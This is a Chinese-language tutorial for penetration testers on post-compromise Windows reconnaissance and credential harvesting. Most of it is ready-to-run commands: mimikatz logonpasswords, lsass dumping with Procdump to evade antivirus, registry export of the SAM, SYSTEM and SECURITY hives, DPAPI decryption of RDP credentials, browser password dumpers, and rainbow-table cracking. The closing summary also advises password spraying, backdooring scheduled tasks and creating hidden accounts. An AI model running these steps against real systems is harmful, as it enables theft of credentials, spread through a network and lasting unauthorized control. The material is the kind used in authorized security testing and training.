- Windows本地基礎資訊收集
- 許可權檢視
- 指定使用者的詳細資訊
- 檢視防火牆狀態
- 機器基礎資訊
- 檢視系統資訊
- 檢視程序情況
- 軟體安裝情況
- 檢視計劃任務
- 網路環境
- 檢視網路配置資訊
- 檢視網路連線情況
- 檢視是否存在域
- 掃描網段
- WMIC收集資訊
- 檢視系統資訊
- 抓本地密碼
- LaZagne抓密碼
- mimikatz 抓密碼
- mimikatz提權獲取密碼
- mimikatz+Procdump離線獲取密碼
- SAMInside獲取密碼
- 原理
- SAMInside
- RDP憑證抓取
- 彩虹表 破解密碼
- 原理
- 瀏覽器密碼
- ChromePass
- WebBrowserPassView
- Windows資訊收集總結
Windows本地基礎資訊收集
注:本機資訊收集可以收集到敏感資訊,另外用收集到的資訊進行提權拿下伺服器,然後還有方便橫向移動擴大戰果,比如內網中為了維護方便有很多密碼都是通用的,但是本機資訊收集方式太多,這裡就只是介紹本人平時最常收集的一些方式。
背景:首先透過webshell或者其他方式拿下了一臺機器,並且存在內網環境,這時候我們就要準備進行內網滲透了。但是內網滲透之前需要對本地機器進行資訊收集,才能夠更好的進行內網滲透。
許可權檢視
作用:是否需要進行提權
whoami
whoami /all
指定使用者的詳細資訊
作用:多個使用者多條路,拿到密碼多試。
加上/domain的話可以判斷是否存在域,查詢的使用者不是域的話就會報錯
當然了你查詢一個不存在的使用者也是會報錯,所以建議先用net user 使用者名稱先檢視一下你輸入的使用者名稱是否存在
#先搜尋使用者賬戶名
wmic useraccount list brief | more
net user 使用者名稱
net user 使用者名稱 /domain
檢視防火牆狀態
netsh advfirewall show allprofiles
機器基礎資訊
版本、補丁、服務、任務、防護等
檢視系統資訊
-
作業系統的詳細配置資訊
這個可以看到操作系統版本、補丁、網路卡情況等等systeminfo -
檢視作業系統的架構
作用:透過該資訊可以有針對性的上傳攻擊工具
echo %PROCESSOR_ARCHITECTURE%
檢視程序情況
作用:可以透過程序列表判斷是否存在殺軟,留到網站上進行匹配即可。
tasklist
可以自己搭建殺軟網站來匹配
軟體安裝情況
作用:檢視有沒有一些第三方工具可以進一步留後門或提權的
檢視系統安裝的軟體與版本資訊
cmd輸入以下命令,如果是powershell的話輸入雙引號裡面的命令即可。
powershell "Get-WmiObject -class Win32_Product | Select-Object -Property name,version"
個人建議使用wmic執行速度比較快
wmic product get name,version
或者詳細一點
wmic product list brief | more #因為比較資訊比較多所以使用more
檢視計劃任務
作用:可能會看到一些敏感資訊,比如需要對某些機器進行互動可能會看到密碼之類的定時任務指令碼等等
schtasks
#更詳細的資訊
schtasks /query /fo LIST /v
網路環境
檢視網路配置資訊
加上/all引數可以檢視到是否存在域
ipconfig /all
檢視網路連線情況
作用:可能會發現內網資料庫連線之類的情況
netstat -ano
檢視是否存在域
檢視域的名
#不存在域的話該命令會報錯(測試過好像不管你登入的時不時域成員,只要機器加入了域就不會報錯,)
net view /domain
#還有其他可以看到是否存在域的情況,面試可能會經常遇到,實戰中只其實只需要知道一個即可,一般來說不會連這種命令都禁用。
#下面中個人最推薦和最常用ipconfig,應該沒人都給你禁用了吧,每個windows系統幾乎都能用這個命令吧
ipconfig /all #判斷存在域,看DNS字尾
systeminfo #會列出所處的域
net config workstation #檢視"工作站域"中顯示 登入組 還是 域,是域的話會顯示你登入的域名
判斷域控主機
net time /domain #不在域環境中或者不是域成員登入進來的會報錯
nslookup 域名 #定位域控主機的IP地址
直接檢視域和定位域控主機ip
wmic ntdomain list brief #這個命令在winserver2003用不了
ping 域名
nslookup 域名
更多域相關知識在域滲透部分詳細說。
掃描網段
這裡有很多方法
1.直接使用系統命令 | 這裡可以使用網上現成的命令或者bat、ps1、shell指令碼
2.python指令碼
3.上傳nmap
4.cs、msf上線掃描網段
等等
WMIC收集資訊
上述基礎資訊檢視也可以透過wmic來進行資訊收集。
WMIC可以描述為一組管理Windows系統的方法和功能。
我們可以把它當作API來與Windows系統進行相互交流,Wmic在滲透測試中的價值在於它不需要下載和安裝,因為wmic是Windows系統自帶的功能,而且整個執行都載計算機的記憶體中發生,不會留下任何痕跡,能用WMIC收集的話儘量用這個就行了其實,自帶的還不用上傳工具過去。
如果你要獲取某幾個列的資料只需要,比如獲取startup 的 command,caption列:wmic startup get command,caption ,
而獲取全部的是命令:wmic startup list brief,即list 都是列出全部的意思。
#檢索系統已安裝的軟體
wmic product list brief | more
或者
wmic product get name,version
#檢索系統執行的服務
wmic service list brief | more
#搜尋檢視程序資訊
wmic process list brief | more
#搜尋啟動程式
wmic startup list brief | more
或者
wmic startup get command,caption
#搜尋共享驅動盤
wmic netuse list brief | more
#搜尋使用者賬戶
wmic useraccount list brief | more
#搜尋計算機域控制器
wmic ntdomain list brief
#搜尋登入使用者
wmic logon list brief | more
#搜尋已安裝的安全更新
wmic qfe list brief | more
抓本地密碼
抓到的hash密碼都能丟到線上網站去查一下:https://www.cmd5.com/
LaZagne抓密碼
若這個工具執行不了的話,就是無法提權,需要有管理員許可權執行才行。
LaZagne跨平臺,支援linux、mac
參考文章:https://www.freebuf.com/articles/database/355888.html
輸出引數:
-oN代表普通文字
-oJ代表JSON
-oA代表全部
啟動模組
啟動所有模組:LaZagne.exe all
啟動一個指定的模組:laZagne.exe browsers
啟動一個指定的軟體指令碼:laZagne.exe browsers -firefox
模式引數
-vv #詳細模式
-quiet #靜音模式
解密域憑證建議指定使用者Windows密碼,否則工具將嘗試所有已找到的Windows密碼
laZagne.exe all -password ZapataVive
常用命令
laZagne.exe all -oN
mimikatz 抓密碼
mimikatz提權獲取密碼
privilege::debug #進入debug模式
sekurlsa::logonpasswords #獲取密碼
mimikatz+Procdump離線獲取密碼
因為procdump是微軟開發的,白名單軟體不會被殺掉,所以用該軟體匯出數,接著傳回我們自己的hacker機器上使用mimkatz抓密碼就可以 了,不用擔心mimikatz被殺
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp"
sekurlsa::logonpasswords
SAMInside獲取密碼
原理
Saminside是一個暴力破解工具,可以透過讀取本地帳戶的lmhash值,對hash值進行暴力破解,從而得到真正的登入密碼。
SAMInside
1.目標伺服器匯出SAM和SYSTEM或SYSKEY檔案
2.通常是不能直接匯出的,所以最好是透過命令視窗匯出指定位置
reg save hklm\sam C:/sam
reg save hklm\system C:/system.key
reg save hklm\security C:/security
3.然後開啟SAMInside選擇匯入
匯入順序:sam->system.key->security
但是我使用windows10沒有嘗試成功。
RDP憑證抓取
mimikatz抓取
1.首先命令列輸入下面這句,先獲取到對應的登入記錄檔案,檔名就是對應的值
dir /a %userprofile%\appdata\local\microsoft\credentials\*
2.如果上面你有發現確實存在對應的記錄檔案的話就可以使用mimikatz來解密了
(這裡我嘗試過將上面dir列出來的Credentials值檔案複製出來,失敗了,所以還是要上傳mimikatz到目標伺服器去解密)
mimikatz.exe "dpapi::cred /in:%userprofile%\AppData\Local\Microsoft\Credentials\Credentials值" exit
3.獲取guidMasterKey,要記得guidMasterKey是什麼值,下一步要用
mimikatz.exe "privilege::debug" "sekurlsa::dpapi" > cerd.txt
4.mimikatz使用DPAPI 模組從記憶體中讀取主金鑰
mimikatz.exe "privilege::debug" "sekurlsa::dpapi"
#建議複製到文字中查詢對應的guidMasterKey值,然後找對應他的MasterKey
mimikatz.exe "privilege::debug" "sekurlsa::dpapi" > cerd.txt
5.查詢guid對應的MasterKey(下面是完整的,不要刪除任何一個空格)
mimikatz.exe "dpapi::cred /in:%userprofile%\AppData\Local\Microsoft\Credentials\ Credentials值/masterkey:masterkey值" exit
我這裡失敗了,具體原因不知道,可能是我沒有使用rdp服務吧,但步驟就是這麼個步驟了。
彩虹表 破解密碼
原理
透過預先計算的hash雜湊鏈集合對來反推明文,因為在一個對中,其中的演算法是固定的,所以只需要重複加密函式即可還原這個雜湊鏈,即頭和尾知道了,比如:1:11,這中間的演算法是+1,+4,那麼這個hash鏈就是:`1-2-6-7-11`,因為是+1 +4,所以中間還原的鏈資料就是`2 6 7`,也就是說我們使用一個對就儲存了5個值或者更多,這裡僅僅只是舉一個例子而已,具體+1+4要迴圈多少次還要看k引數。
所以利用這個彩虹表去獲取密碼就會比較快速。
吐槽:其實常規點的hash密碼丟到線上網站上直接就出來了,很少用彩虹表。
抓hash工具很多,可以是Procdump、pwdump等等,這裡就用pwdump。
透過抓取到的hash,放到ophcrack https://ophcrack.sourceforge.io/工具上,用收集到的彩虹表https://www.freerainbowtables.com/
下載好採用表後,用ophcrack 載入資料
點選install後會讓你選擇你的彩虹表資料夾
彩虹表的資料如下
載入完成後你拿到的hash解不出來就可以丟到工具中看能不能撞出來
比如我這裡使用pwdump8.exe拿到hash密碼
然後隨便複製丟到工具中點選crack,我這裡是一個一個的複製進去,你也可以透過其他load方式
瀏覽器密碼
參考文章:https://cloud.tencent.com/developer/article/2204689
下面下載工具可能會報毒,你到官網下載也是一樣,儘量開一個免殺目錄或者關閉殺軟
這裡無腦用工具即可,附上網盤下載地址(注意解壓的密碼):https://pan.baidu.com/s/1IGwstSUrSWdZv3pJ5baacQ?pwd=ihof
也可以到官網下載:
https://www.nirsoft.net/password_recovery_tools.html
按照下面的方式下載工具包即可注意解壓的密碼
ChromePass
雙擊開啟即可看到密碼了,厚碼附上
WebBrowserPassView
可以使用命令列模式進行儲存密碼,在無法遠端控制的時候使用命令列動靜比較小
引數可以看操作指南
這裡就儲存為/stext文字檔案,同樣密碼出來了,十分恐怖。
雙擊開啟也是能直接看到瀏覽器洩露的密碼,十分恐怖,這還真用我自己的瀏覽器快取開啟的。
Windows資訊收集總結
簡單總結一下平時拿到主機後本人會做什麼
(總結不全,但最終目的是為了擴大戰果)
內網資訊收集
先看許可權
systeminfo系統資訊、補丁資訊等等
程序、服務、軟體安裝情況、計劃任務
檢視內網網路環境、網路連線情況,判斷下是否需要做內網穿透
判斷是否存在域環境
然後就可以掃內網網段探測存活主機
收集本機各種密碼,如果是域控主機等等之類在同一環境下用同一密碼都是很有可能的
收集一下rdp密碼、用工具匯出本地hash進行破解
如果拿到的機器是個人電腦可以嘗試抓取本地瀏覽器密碼
net user看下有哪些使用者,拿著收集到的密碼一個個嘗試
拿下機器後如果需要持久化控制的話可以留後門,那麼我們資訊收集部分拿到的一些比如計劃任務指令碼也可以注入自己的惡意程式碼或者直接寫一個定時任務指令碼,指令碼也可以進行檔案隱藏、做隱藏賬戶或者克隆賬戶,這裡其實可以借鑑病毒留後門的方法。
以上收集到的資訊最好是開一個文件儲存下來。